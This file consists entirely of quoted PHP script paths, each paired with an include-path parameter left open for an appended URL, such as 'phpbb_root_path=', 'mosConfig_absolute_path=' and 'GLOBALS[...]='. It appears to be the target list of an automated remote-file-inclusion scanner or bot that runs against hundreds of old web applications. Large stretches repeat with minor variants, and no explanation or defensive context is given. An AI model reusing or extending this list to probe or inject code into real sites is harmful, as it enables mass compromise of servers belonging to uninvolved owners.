'auction/auction_common.php?phpbb_root_path=',

'index.php?inc_dir=',

'calendar/index.php?inc_dir=',

'modules/TotalCalendar/index.php?inc_dir=',

'modules/calendar/index.php?inc_dir=',

'calendar/embed/day.php?path=',

'ACalendar/embed/day.php?path=',

'calendar/add_event.php?inc_dir=',

'claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=',

'claroline/auth/ldap/authldap.php?includePath=',

'docebo/modules/credits/help.php?lang=',

'modules/credits/help.php?lang=',

'config.php?returnpath=',

'editsite.php?returnpath=',

'in.php?returnpath=',

'addsite.php?returnpath=',

'includes/pafiledb_constants.php?module_root_path=',

'phpBB/includes/pafiledb_constants.php?module_root_path=',

'pafiledb/includes/pafiledb_constants.php?module_root_path=',

'auth/auth.php?phpbb_root_path=',

'auth/auth_phpbb/phpbb_root_path=',

'apc-aa/cron.php?GLOBALS[AA_INC_PATH]=',

'apc-aa/cached.php?GLOBALS[AA_INC_PATH]=',

'infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=',

'phpdig/includes/config.php?relative_script_path=',

'includes/phpdig/includes/config.php?relative_script_path=',

'includes/dbal.php?eqdkp_root_path=',

'eqdkp/includes/dbal.php?eqdkp_root_path=',

'dkp/includes/dbal.php?eqdkp_root_path=',

'include/SQuery/gameSpy.php?libpath=',

'include/global.php?GLOBALS[includeBit]=',

'topsites/config.php?returnpath=',

'manager/frontinc/prepend.php?_PX_config[manager_path]=',

'ubbthreads/addpost_newpoll.php?addpollthispath=',

'forum/addpost_newpoll.php?thispath=',

'forums/addpost_newpoll.php?thispath=',

'ubbthreads/ubbt.inc.php?thispath=',

'forums/ubbt.inc.php?thispath=',

'forum/ubbt.inc.php?thispath=',

'forum/admin/addentry.php?phpbb_root_path=',

'admin/addentry.php?phpbb_root_path=',

'index.php?f=',

'index.php?act=',

'ipchat.php?root_path=',

'includes/orderSuccess.inc.php?glob[rootDir]=',

'stats.php?dir[func]dir[base]=',

'ladder/stats.php?dir[base]=',

'ladders/stats.php?dir[base]=',

'sphider/admin/configset.php?settings_dir=',

'admin/configset.php?settings_dir=',

'vwar/admin/admin.php?vwar_root=',

'modules/vwar/admin/admin.php?vwar_root=',

'modules/vWar_Account/includes/get_header.php?vwar_root=',

'modules/vWar_Account/includes/functions_common.php?vwar_root=',

'sphider/admin/configset.php?settings_dir=',

'admin/configset.php?settings_dir=',

'impex/ImpExData.php?systempath=',

'forum/impex/ImpExData.php?systempath=',

'forums/impex/ImpExData.php?systempath=',

'application.php?base_path=',

'index.php?theme_path=',

'become_editor.php?theme_path=',

'add.php?theme_path=',

'bad_link.php?theme_path=',

'browse.php?theme_path=',

'detail.php?theme_path=',

'fav.php?theme_path=',

'get_rated.php?theme_path=',

'login.php?theme_path=',

'mailing_list.php?theme_path=',

'new.php?theme_path=',

'modify.php?theme_path=',

'pick.php?theme_path=',

'power_search.php?theme_path=',

'rating.php?theme_path=',

'register.php?theme_path=',

'review.php?theme_path=',

'rss.php?theme_path=',

'search.php?theme_path=',

'send_pwd.php?theme_path=',

'sendmail.php?theme_path=',

'tell_friend.php?theme_path=',

'top_rated.php?theme_path=',

'user_detail.php?theme_path=',

'user_search.php?theme_path=',

'invoice.php?base_path=',

'cgi-bin//classes/adodbt/sql.php?classes_dir=',

'cgi-bin/install/index.php?G_PATH=',

'cgi-bin/include/print_category.php?dir=',

'includes/class_template.php?quezza_root_path=',

'bazar/classified_right.php?language_dir=',

'classified_right.php?language_dir=',

'phpBazar/classified_right.php?language_dir=',

'chat/messagesL.php?cmd=',

'phpMyChat/chat/messagesL.php?cmd=',

'bbs/include/write.php?dir=',

'visitorupload.php?cmd=',

'modules/center/admin/accounts/process.php?module_path]=',

'index.php?template=',

'armygame.php?libpath=',

'lire.php?rub=',

'pathofhostadmin/?page=',

'apa_phpinclude.inc.php?apa_module_basedir=',

'index.php?req_path=',

'research/boards/encapsbb-.._fixed/index_header.php?root=',

'Farsi/index.php?archive=',

'index.php?archive=',

'show_archives.php?template=',

'forum/include/common.php?pun_root=',

'pmwiki wiki/pmwiki-..beta/pmwiki.php?GLOBALS[FarmD]=',

'vuln.php?=',

'cgi-bin//include/write.php?dir=',

'admin/common.inc.php?basepath=',

'pm/lib.inc.php?sfx=',

'pm/lib.inc.php?pm_path=',

'artmedic-kleinanzeigen-path/index.php?id=',

'osticket/include/main.php?include_dir=',

'include/main.php?config[search_disp]include_dir=',

'phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=',

'quick_reply.php?phpbb_root_path=',

'zboard/include/write.php?dir=',

'admin/plog-admin-functions.php?configbasedir=',

'content.php?content=',

'q-news.php?id=',

'_conf/core/common-tpl-vars.php?confdir=',

'votebox.php?VoteBoxPath=',

'al_initialize.php?alpath=',

'include/db.php?GLOBALS[rootdp]=',

'modules/news/archivednews.php?GLOBALS[language_home]=',

'protection.php?siteurl=',

'modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=',

'index.php?includes_dir=',

'classes.php?LOCAL_PATH=',

'extensions/moblog/moblog_lib.php?basedir=',

'modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=',

'phpWebLog/include/init.inc.php?G_PATH=',

'admin/objects.inc.php?Server=',

'trg_news/trgnews/install/article.php?dir=',

'block.php?Include=',

'arpuivo.php?data=',

'setup/index.php?GALLERY_BASEDIR=',

'include/help.php?base=',

'index.php?[Home]=',

'block.php?Include=',

'examples/phonebook.php?page=',

'PHPNews/auth.php?path=',

'include/print_category.php?dir=',

'skin/zero_vote/login.php?dir=',

'skin/zero_vote/setup.php?dir=',

'skin/zero_vote/ask_password.php?dir=',

'gui/include/sql.php?include_path=',

'webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=',

'email.php?logincer_skin=',

'PhotoGal/ops/gals.php?news_file=',

'index.php?custom=',

'loginout.php?cutepath=',

'oneadmin/config.php?path[docroot]=',

'xcomic/initialize.php?xcomicRootPath=',

'skin/zero_vote/setup.php?dir=',

'skin/zero_vote/error.php? dir=',

'admin_modules/admin_module_captions.inc.php?config[path_src_include]=',

'admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=',

'admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=',

'admin_modules/admin_module_edit.inc.php?config[path_src_include]=',

'admin_modules/admin_module_delimage.inc.php?config[path_src_include]=',

'admin_modules/admin_module_deldir.inc.php?config[path_src_include]=',

'src/index_overview.inc.php?config[path_src_include]=',

'src/index_leftnavbar.inc.php?config[path_src_include]=',

'src/index_image.inc.php?config[path_src_include]=',

'src/image-gd.class.php?config[path_src_include]=',

'src/image.class.php?config[path_src_include]=',

'src/album.class.php?config[path_src_include]=',

'src/show_random.inc.php?config[path_src_include]=',

'src/main.inc.php?config[path_src_include]=',

'src/index_passwd-admin.inc.php?config[path_admin_include]=',

'yappa-ng/src/index_overview.inc.php?config[path_src_include]=',

'admin_modules/admin_module_captions.inc.php?config[path_src_include]=',

'admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=',

'admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=',

'admin_modules/admin_module_edit.inc.php?config[path_src_include]=',

'admin_modules/admin_module_delimage.inc.php?config[path_src_include]=',

'admin_modules/admin_module_deldir.inc.php?config[path_src_include]=',

'src/index_overview.inc.php?config[path_src_include]=',

'src/image-gd.class.php?config[path_src_include]=',

'src/image.class.php?config[image_module]=',

'src/album.class.php?config[path_src_include]=',

'src/show_random.inc.php?config[path_src_include]=',

'src/main.inc.php?config[path_src_include]=',

'includes/db_adodb.php?baseDir=',

'includes/db_connect.php?baseDir=',

'includes/session.php?baseDir=',

'modules/projects/gantt.php?dPconfig[root_dir]=',

'modules/projects/gantt.php?dPconfig[root_dir]=',

'modules/projects/vw_files.php?dPconfig[root_dir]=',

'modules/admin/vw_usr_roles.php?baseDir=',

'modules/public/calendar.php?baseDir=',

'modules/public/date_format.php?baseDir=',

'modules/tasks/gantt.php?baseDir=',

'mantis/login_page.php?g_meta_include_file=',

'phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY=',

'modules/My_eGallery/public/displayCategory.php?basepath=',

'dotproject/modules/files/index_table.php?root_dir=',

'nukebrowser.php?filnavn=',

'bug_sponsorship_list_view_inc.php?t_core_path=',

'modules/coppermine/themes/coppercop/theme.php?THEME_DIR=',

'modules/coppermine/themes/maze/theme.php?THEME_DIR=',

'modules/coppermine/include/init.inc.php?CPG_M_DIR=',

'includes/calendar.php?phpc_root_path=',

'includes/setup.php?phpc_root_path=',

'phpBB/admin/admin_styles.php?mode=',

'aMember/plugins/db/mysql/mysql.inc.php?config=',

'admin/lang.php?CMS_ADMIN_PAGE=',

'inc/pipe.php?HCL_path=',

'include/write.php?dir=',

'becommunity/community/index.php?pageurl=',

'modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=',

'modules/mod_mainmenu.php?mosConfig_absolute_path=',

'modules/agendax/addevent.inc.php?agendax_path=',

'shoutbox/expanded.php?conf=',

'modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=',

'index.php?page=',

'index.php?pag=',

'index.php?include=',

'index.php?content=',

'index.php?cont=',

'index.php?c=',

'modules/My_eGallery/index.php?basepath=',

'modules/newbb_plus/class/forumpollrenderer.php?bbPath=',

'journal.php?m=',

'index.php?m=',

'links.php?c=',

'forums.php?m=',

'list.php?c=',

'user.php?xoops_redirect=',

'index.php?id=',

'r.php?url=',

'CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]=',

'inc/formmail.inc.php?script_root=',

'include/init.inc.php?G_PATH=',

'backend/addons/links/index.php?PATH=',

'modules/newbb_plus/class/class.forumposts.php?bbPath[path]=',

'modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=',

'protection.php?siteurl=',

'htmltonuke.php?filnavn=',

'mail_autocheck.php?pm_path=',

'index.php?p=',

'modules/nAlbum/public/displayCategory.php?basepath=',

'e/e_handlers/secure_img_render.php?p=',

'include/new-visitor.inc.php?lvc_include_dir=',

'community/modules/agendax/addevent.inc.php?agendax_path=',

'library/editor/editor.php?root=',

'library/lib.php?root=',

'zentrack/index.php?configFile=',

'pivot/modules/module_db.php?pivot_path=',

'myPHPCalendar/admin.php?cal_dir=',

'index.php/main.php?x=',

'os/pointer.php?url=',

'p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=',

'db.php?path_local=',

'phpGedView/individual.php?PGV_BASE_DIRECTORY=',

'index.php?kietu[url_hit]=',

'phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=',

'Sources/Packages.php?sourcedir=',

'modules/PNphpBB/includes/functions_admin.php?phpbb_root_path=',

'cgi-bin//gadgets/Blog/BlogModel.php?path=',

'modules/my_egallery/?root_path=',

'adminpanel/includes/add_forms/addbioform.php?root_path=',

'adminpanel/includes/add_forms/addfliersform.php?root_path=',

'adminpanel/includes/add_forms/addgenmerchform.php?root_path=',

'adminpanel/includes/add_forms/addinterviewsform.php?root_path=',

'adminpanel/includes/add_forms/addlinksform.php?root_path=',

'adminpanel/includes/add_forms/addlyricsform.php?root_path=',

'adminpanel/includes/add_forms/addmembioform.php?root_path=',

'adminpanel/includes/add_forms/addmerchform.php?root_path=',

'adminpanel/includes/add_forms/addmerchpicform.php?root_path=',

'adminpanel/includes/add_forms/addnewsform.php?root_path=',

'adminpanel/includes/add_forms/addphotosform.php?root_path=',

'adminpanel/includes/add_forms/addreleaseform.php?root_path=',

'adminpanel/includes/add_forms/addreleasepicform.php?root_path=',

'adminpanel/includes/add_forms/addrelmerchform.php?root_path=',

'adminpanel/includes/add_forms/addshowsform.php?root_path=',

'adminpanel/includes/add_forms/addreviewsform.php?root_path=',

'adminpanel/includes/add_forms/addwearmerchform.php?root_path=',

'adminpanel/includes/mailinglist/disphtmltbl.php?root_path=',

'adminpanel/includes/mailinglist/dispxls.php?root_path=',

'preload.php?configowned&func_prog=',

'index.php?configowned&func_prog=',

'missing.php?header_prog=',

'_inc/footer.php?theme_root=',

'_inc/header.php?theme_root=',

'_inc/pfooter.php?theme_root=',

'_inc/pheader.php?theme_root=',

'_inc/web_statsConfig.php?mod_dir=',

'_inc/web_statsConfig.php?php_ext=',

'_mods/email.php?header_prog=',

'_mods/files.php?header_prog=',

'_mods/headlines.php?header_prog=',

'_mods/search.php?header_prog=',

'_mods/topics.php?header_prog=',

'admanagerpro/common.php?ipath=',

'templates/deluxe/postreply.php?templatefolder=',

'templates/deluxe/posting.php?templatefolder=',

'templates/deluxe/pm/newpm.php?templatefolder=',

'templates/default/postreply.php?templatefolder=',

'templates/default/posting.php?templatefolder=',

'templates/default/pm/newpm.php?templatefolder=',

'modules/Forums/admin/index.php?phpbb_root_path=',

'modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=',

'modules/Forums/admin/admin_board.php?phpbb_root_path=',

'modules/Forums/admin/admin_disallow.php?phpbb_root_path=',

'modules/Forums/admin/admin_forumauth.php?phpbb_root_path=',

'modules/Forums/admin/admin_groups.php?phpbb_root_path=',

'modules/Forums/admin/admin_ranks.php?phpbb_root_path=',

'modules/Forums/admin/admin_styles.php?phpbb_root_path=',

'modules/Forums/admin/admin_user_ban.php?phpbb_root_path=',

'modules/Forums/admin/admin_words.php?phpbb_root_path=',

'modules/Forums/admin/admin_avatar.php?phpbb_root_path=',

'modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=',

'modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=',

'modules/Forums/admin/admin_forums.php?phpbb_root_path=',

'modules/Forums/admin/admin_mass_email.php?phpbb_root_path=',

'modules/Forums/admin/admin_smilies.php?phpbb_root_path=',

'modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=',

'modules/Forums/admin/admin_users.php?phpbb_root_path=',

'faq.php?foing_root_path=',

'index.php?foing_root_path=',

'list.php?foing_root_path=',

'login.php?foing_root_path=',

'playlist.php?foing_root_path=',

'song.php?foing_root_path=',

'gen_mu.php?foing_root_path=',

'view_artist.php?foing_root_path=',

'view_song.php?foing_root_path=',

'login.php?foing_root_path=',

'playlist.php?foing_root_path=',

'song.php?foing_root_path=',

'flash/set_na.php?foing_root_path=',

'flash/initialise.php?foing_root_path=',

'flash/get_song.php?foing_root_path=',

'includes/common.php?foing_root_path=',

'admin/nav.php?foing_root_path=',

'admin/main.php?foing_root_path=',

'admin/list_artists.php?foing_root_path=',

'admin/index.php?foing_root_path=',

'admin/genres.php?foing_root_path=',

'admin/edit_artist.php?foing_root_path=',

'admin/edit_album.php?foing_root_path=',

'admin/config.php?foing_root_path=',

'admin/admin_status.php?foing_root_path=',

'includes/header.php?systempath=',

'Gallery/displayCategory.php?basepath=',

'index.inc.php?PATH_Includes=',

'nphp/nphpd.php?nphp_config[LangFile]=',

'include/db.php?GLOBALS[rootdp]=',

'ashnews.php?pathtoashnews=',

'ashheadlines.php?pathtoashnews=',

'modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=',

'demo/includes/init.php?user_inc=',

'jaf/index.php?show=',

'inc/shows.inc.php?cutepath=',

'poll/admin/common.inc.php?base_path=',

'pollvote/pollvote.php?pollname=',

'sources/post.php?fil_config=',

'modules/My_eGallery/public/displayCategory.php?basepath=',

'bb_lib/checkdb.inc.php?libpach=',

'include/livre_include.php?no_connect=lol&chem_absolu=',

'index.php?from_market=Y&pageurl=',

'modules/mod_mainmenu.php?mosConfig_absolute_path=',

'pivot/modules/module_db.php?pivot_path=',

'modules/4nAlbum/public/displayCategory.php?basepath=',

'derniers_commentaires.php?rep=',

'modules/coppermine/themes/default/theme.php?THEME_DIR=',

'modules/coppermine/include/init.inc.php?CPG_M_DIR=',

'modules/coppermine/themes/coppercop/theme.php?THEME_DIR=',

'coppermine/themes/maze/theme.php?THEME_DIR=',

'allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=',

'allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=',

'myPHPCalendar/admin.php?cal_dir=',

'agendax/addevent.inc.php?agendax_path=',

'modules/mod_mainmenu.php?mosConfig_absolute_path=',

'modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=',

'main.php?page=',

'default.php?page=',

'index.php?action=',

'index1.php?p=',

'index2.php?x=',

'index2.php?content=',

'index.php?conteudo=',

'index.php?cat=',

'include/new-visitor.inc.php?lvc_include_dir=',

'modules/agendax/addevent.inc.php?agendax_path=',

'shoutbox/expanded.php?conf=',

'modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=',

'pivot/modules/module_db.php?pivot_path=',

'library/editor/editor.php?root=',

'library/lib.php?root=',

'e107/e107_handlers/secure_img_render.php?p=',

'zentrack/index.php?configFile=',

'main.php?x=',

'becommunity/community/index.php?pageurl=',

'GradeMap/index.php?page=',

'mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=',

'zentrack/index.php?configFile=',

'pivot/modules/module_db.php?pivot_path=',

'inc/header.php/step_one.php?server_inc=',

'inc/pipe.php?HCL_path=',

'include/write.php?dir=',

'include/new-visitor.inc.php?lvc_include_dir=',

'includes/header.php?systempath=',

'support/mailling/maillist/inc/initdb.php?absolute_path=',

'coppercop/theme.php?THEME_DIR=',

'zentrack/index.php?configFile=',

'pivot/modules/module_db.php?pivot_path=',

'inc/header.php/step_one.php?server_inc=',

'inc/pipe.php?HCL_path=',

'include/write.php?dir=',

'include/new-visitor.inc.php?lvc_include_dir=',

'includes/header.php?systempath=',

'support/mailling/maillist/inc/initdb.php?absolute_path=',

'coppercop/theme.php?THEME_DIR=',

'becommunity/community/index.php?pageurl=',

'shoutbox/expanded.php?conf=',

'agendax/addevent.inc.php?agendax_path=',

'myPHPCalendar/admin.php?cal_dir=',

'yabbse/Sources/Packages.php?sourcedir=',

'path_of_cpcommerce/_functions.php?prefix=',

'dotproject/modules/projects/addedit.php?root_dir=',

'dotproject/modules/projects/view.php?root_dir=',

'dotproject/modules/projects/vw_files.php?root_dir=',

'dotproject/modules/tasks/addedit.php?root_dir=',

'dotproject/modules/tasks/viewgantt.php?root_dir=',

'My_eGallery/public/displayCategory.php?basepath=',

'modules/My_eGallery/public/displayCategory.php?basepath=',

'modules/4nAlbum/public/displayCategory.php?basepath=',

'modules/coppermine/themes/default/theme.php?THEME_DIR=',

'modules/agendax/addevent.inc.php?agendax_path=',

'modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=',

'modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=',

'modules/coppermine/include/init.inc.php?CPG_M_DIR=',

'modules/mod_mainmenu.php?mosConfig_absolute_path=',

'shoutbox/expanded.php?conf=',

'pivot/modules/module_db.php?pivot_path=',

'library/editor/editor.php?root=',

'library/lib.php?root=',

'e107/e107_handlers/secure_img_render.php?p=',

'main.php?x=',

'main.php?page=',

'default.php?page=',

'index.php?meio.php=',

'index.php?include= ',

'index.php?inc= ',

'index.php?page= ',

'index.php?pag= ',

'index.php?p=',

'index.php?x=',

'index.php?open= ',

'index.php?open=',

'index.php?visualizar=',

'index.php?pagina=',

'index.php?content=',

'index.php?cont=',

'index.php?c=',

'index.php?meio=',

'index.php?x=',

'index.php?cat=',

'index.php?site=',

'index.php?configFile=',

'index.php?action=',

'index.php?do=',

'index2.php?x=',

'index2.php?content=',

'template.php?pagina=',

'inc/step_one_tables.php?server_inc=',

'GradeMap/index.php?page=',

'phpshop/index.php?base_dir=',

'admin.php?cal_dir=',

'path_of_cpcommerce/_functions.php?prefix=',

'contacts.php?cal_dir=',

'convert-date.php?cal_dir=',

'album_portal.php?phpbb_root_path=',

'mainfile.php?MAIN_PATH=',

'dotproject/modules/files/index_table.php?root_dir=',

'html/affich.php?base=',

'gallery/init.php?HTTP_POST_VARS=',

'pm/lib.inc.php?pm_path=',

'ideabox/include.php?gorumDir=',

'index2.php?includes_dir=',

'forums/toplist.php?phpbb_root_path=',

'forum/toplist.php?phpbb_root_path=',

'admin/config_settings.tpl.php?include_path=',

'include/common.php?include_path=',

'event/index.php?page=',

'forum/index.php?includeFooter=',

'forums/index.php?includeFooter=',

'forum/bb_admin.php?includeFooter=',

'forums/bb_admin.php?includeFooter=',

'language/lang_english/lang_activity.php?phpbb_root_path=',

'forum/language/lang_english/lang_activity.php?phpbb_root_path=',

'blend_data/blend_common.php?phpbb_root_path=',

'master.php?root_path=',

'includes/kb_constants.php?module_root_path=',

'forum/includes/kb_constants.php?module_root_path=',

'forums/includes/kb_constants.php?module_root_path=',

'classes/adodbt/sql.php?classes_dir=',

'agenda.php3?rootagenda=',

'agenda2.php3?rootagenda=',

'sources/lostpw.php?CONFIG[path]=',

'topsites/sources/lostpw.php?CONFIG[path]=',

'toplist/sources/lostpw.php?CONFIG[path]=',

'sources/join.php?CONFIG[path]=',

'topsites/sources/join.php?CONFIG[path]=',

'toplist/sources/join.php?CONFIG[path]=',

'topsite/sources/join.php?CONFIG[path]=',

'public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=',

'extras/poll/poll.php?file_newsportal=',

'index.php?site_path=',

'mail/index.php?site_path=',

'fclick/show.php?path=',

'show.php?path=',

'calogic/reconfig.php?GLOBALS[CLPath]=',

'eshow.php?Config_rootdir=',

'auction/auction_common.php?phpbb_root_path=',

'index.php?inc_dir=',

'calendar/index.php?inc_dir=',

'modules/TotalCalendar/index.php?inc_dir=',

'modules/calendar/index.php?inc_dir=',

'calendar/embed/day.php?path=',

'ACalendar/embed/day.php?path=',

'calendar/add_event.php?inc_dir=',

'claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=',

'claroline/auth/ldap/authldap.php?includePath=',

'docebo/modules/credits/help.php?lang=',

'modules/credits/help.php?lang=',

'config.php?returnpath=',

'editsite.php?returnpath=',

'in.php?returnpath=',

'addsite.php?returnpath=',

'includes/pafiledb_constants.php?module_root_path=',

'phpBB/includes/pafiledb_constants.php?module_root_path=',

'pafiledb/includes/pafiledb_constants.php?module_root_path=',

'auth/auth.php?phpbb_root_path=',

'auth/auth_phpbb/phpbb_root_path=',

'apc-aa/cron.php3?GLOBALS[AA_INC_PATH]=',

'apc-aa/cached.php3?GLOBALS[AA_INC_PATH]=',

'infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=',

'phpdig/includes/config.php?relative_script_path=',

'includes/phpdig/includes/config.php?relative_script_path=',

'includes/dbal.php?eqdkp_root_path=',

'eqdkp/includes/dbal.php?eqdkp_root_path=',

'dkp/includes/dbal.php?eqdkp_root_path=',

'path/include/SQuery/gameSpy2.php?libpath=',

'include/global.php?GLOBALS[includeBit]=',

'topsites/config.php?returnpath=',

'manager/frontinc/prepend.php?_PX_config[manager_path]=',

'ubbthreads/addpost_newpoll.php?addpoll=thispath=',

'forum/addpost_newpoll.php?thispath=',

'forums/addpost_newpoll.php?thispath=',

'ubbthreads/ubbt.inc.php?thispath=',

'forums/ubbt.inc.php?thispath=',

'forum/ubbt.inc.php?thispath=',

'forum/admin/addentry.php?phpbb_root_path=',

'admin/addentry.php?phpbb_root_path=',

'index.php?f=',

'index.php?act=',

'ipchat.php?root_path=',

'includes/orderSuccess.inc.php?glob[rootDir]=',

'stats.php?dir[func]=dir[base]=',

'ladder/stats.php?dir[base]=',

'ladders/stats.php?dir[base]=',

'sphider/admin/configset.php?settings_dir=',

'admin/configset.php?settings_dir=',

'vwar/admin/admin.php?vwar_root=',

'modules/vwar/admin/admin.php?vwar_root=',

'modules/vWar_Account/includes/get_header.php?vwar_root=',

'modules/vWar_Account/includes/functions_common.php?vwar_root2=',

'sphider/admin/configset.php?settings_dir=',

'admin/configset.php?settings_dir=',

'impex/ImpExData.php?systempath=',

'forum/impex/ImpExData.php?systempath=',

'forums/impex/ImpExData.php?systempath=',

'application.php?base_path=',

'index.php?theme_path=',

'become_editor.php?theme_path=',

'add.php?theme_path=',

'bad_link.php?theme_path=',

'browse.php?theme_path=',

'detail.php?theme_path=',

'fav.php?theme_path=',

'get_rated.php?theme_path=',

'login.php?theme_path=',

'mailing_list.php?theme_path=',

'new.php?theme_path=',

'modify.php?theme_path=',

'pick.php?theme_path=',

'power_search.php?theme_path=',

'rating.php?theme_path=',

'register.php?theme_path=',

'review.php?theme_path=',

'rss.php?theme_path=',

'search.php?theme_path=',

'send_pwd.php?theme_path=',

'sendmail.php?theme_path=',

'tell_friend.php?theme_path=',

'top_rated.php?theme_path=',

'user_detail.php?theme_path=',

'user_search.php?theme_path=',

'invoice.php?base_path=',

'cgi-bin//classes/adodbt/sql.php?classes_dir=',

'cgi-bin/install/index.php?G_PATH=',

'cgi-bin/include/print_category.php?dir=',

'includes/class_template.php?quezza_root_path=',

'bazar/classified_right.php?language_dir=',

'classified_right.php?language_dir=',

'phpBazar/classified_right.php?language_dir=',

'chat/messagesL.php3?cmd=',

'phpMyChat/chat/messagesL.php3?cmd=',

'bbs/include/write.php?dir=',

'visitorupload.php?cmd=',

'modules/center/admin/accounts/process.php?module_path]=',

'index.php?template=',

'armygame.php?libpath=',

'lire.php?rub=',

'pathofhostadmin/?page=',

'apa_phpinclude.inc.php?apa_module_basedir=',

'index.php?req_path=',

'research/boards/encapsbb-0.3.2_fixed/index_header.php?root=',

'Farsi1/index.php?archive=',

'index.php?archive=',

'show_archives.php?template=',

'forum/include/common.php?pun_root=',

'pmwiki wiki/pmwiki-2.1.beta20/pmwiki.php?GLOBALS[FarmD]=',

'vuln.php?=',

'cgi-bin//include/write.php?dir=',

'admin/common.inc.php?basepath=',

'pm/lib.inc.php?sfx=',

'pm/lib.inc.php?pm_path=',

'artmedic-kleinanzeigen-path/index.php?id=',

'index.php?pagina=',

'osticket/include/main.php?include_dir=',

'include/main.php?config[search_disp]=include_dir=',

'phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=',

'quick_reply.php?phpbb_root_path=',

'zboard/include/write.php?dir=',

'PATH/admin/plog-admin-functions.php?configbasedir=',

'path_to_phpgreetz/content.php?content=',

'path_to_qnews/q-news.php?id=',

'_conf/core/common-tpl-vars.php?confdir=',

'votebox.php?VoteBoxPath=',

'al_initialize.php?alpath=',

'include/db.php?GLOBALS[rootdp]=',

'modules/news/archivednews.php?GLOBALS[language_home]=',

'protection.php?siteurl=',

'modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=',

'index2.php?includes_dir=',

'classes.php?LOCAL_PATH=',

'extensions/moblog/moblog_lib.php?basedir=',

'modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=',

'phpWebLog/include/init.inc.php?G_PATH=',

'admin/objects.inc.php4?Server=',

'trg_news30/trgnews/install/article.php?dir=',

'block.php?Include=',

'arpuivo.php?data=',

'path_to_gallery/setup/index.php?GALLERY_BASEDIR=',

'include/help.php?base=',

'index.php?[Home]=',

'path_to_script/block.php?Include=',

'examples/phonebook.php?page=',

'PHPNews/auth.php?path=',

'include/print_category.php?dir=',

'skin/zero_vote/login.php?dir=',

'skin/zero_vote/setup.php?dir=',

'skin/zero_vote/ask_password.php?dir=',

'gui/include/sql.php?include_path=',

'webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=',

'email.php?login=cer_skin=',

'PhotoGal/ops/gals.php?news_file=',

'index.php?custom=',

'loginout.php?cutepath=',

'oneadmin/config.php?path[docroot]=',

'xcomic/initialize.php?xcomicRootPath=',

'skin/zero_vote/setup.php?dir=',

'skin/zero_vote/error.php? dir=',

'admin_modules/admin_module_captions.inc.php?config[path_src_include]=',

'admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=',

'admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=',

'admin_modules/admin_module_edit.inc.php?config[path_src_include]=',

'admin_modules/admin_module_delimage.inc.php?config[path_src_include]=',

'admin_modules/admin_module_deldir.inc.php?config[path_src_include]=',

'src/index_overview.inc.php?config[path_src_include]=',

'src/index_leftnavbar.inc.php?config[path_src_include]=',

'src/index_image.inc.php?config[path_src_include]=',

'src/image-gd.class.php?config[path_src_include]=',

'src/image.class.php?config[path_src_include]=',

'src/album.class.php?config[path_src_include]=',

'src/show_random.inc.php?config[path_src_include]=',

'src/main.inc.php?config[path_src_include]=',

'src/index_passwd-admin.inc.php?config[path_admin_include]=',

'yappa-ng/src/index_overview.inc.php?config[path_src_include]=',

'admin_modules/admin_module_captions.inc.php?config[path_src_include]=',

'admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=',

'admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=',

'admin_modules/admin_module_edit.inc.php?config[path_src_include]=',

'admin_modules/admin_module_delimage.inc.php?config[path_src_include]=',

'admin_modules/admin_module_deldir.inc.php?config[path_src_include]=',

'src/index_overview.inc.php?config[path_src_include]=',

'src/image-gd.class.php?config[path_src_include]=',

'src/image.class.php?config[image_module]=',

'src/album.class.php?config[path_src_include]=',

'src/show_random.inc.php?config[path_src_include]=',

'src/main.inc.php?config[path_src_include]=',

'includes/db_adodb.php?baseDir=',

'includes/db_connect.php?baseDir=',

'includes/session.php?baseDir=',

'modules/projects/gantt.php?dPconfig[root_dir]=',

'modules/projects/gantt2.php?dPconfig[root_dir]=',

'modules/projects/vw_files.php?dPconfig[root_dir]=',

'modules/admin/vw_usr_roles.php?baseDir=',

'modules/public/calendar.php?baseDir=',

'modules/public/date_format.php?baseDir=',

'modules/tasks/gantt.php?baseDir=',

'mantis/login_page.php?g_meta_include_file=',

'phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY=',

'modules/My_eGallery/public/displayCategory.php?basepath=',

'dotproject/modules/files/index_table.php?root_dir=',

'nukebrowser.php?filnavn=',

'bug_sponsorship_list_view_inc.php?t_core_path=',

'modules/coppermine/themes/coppercop/theme.php?THEME_DIR=',

'modules/coppermine/themes/maze/theme.php?THEME_DIR=',

'modules/coppermine/include/init.inc.php?CPG_M_DIR=',

'includes/calendar.php?phpc_root_path=',

'includes/setup.php?phpc_root_path=',

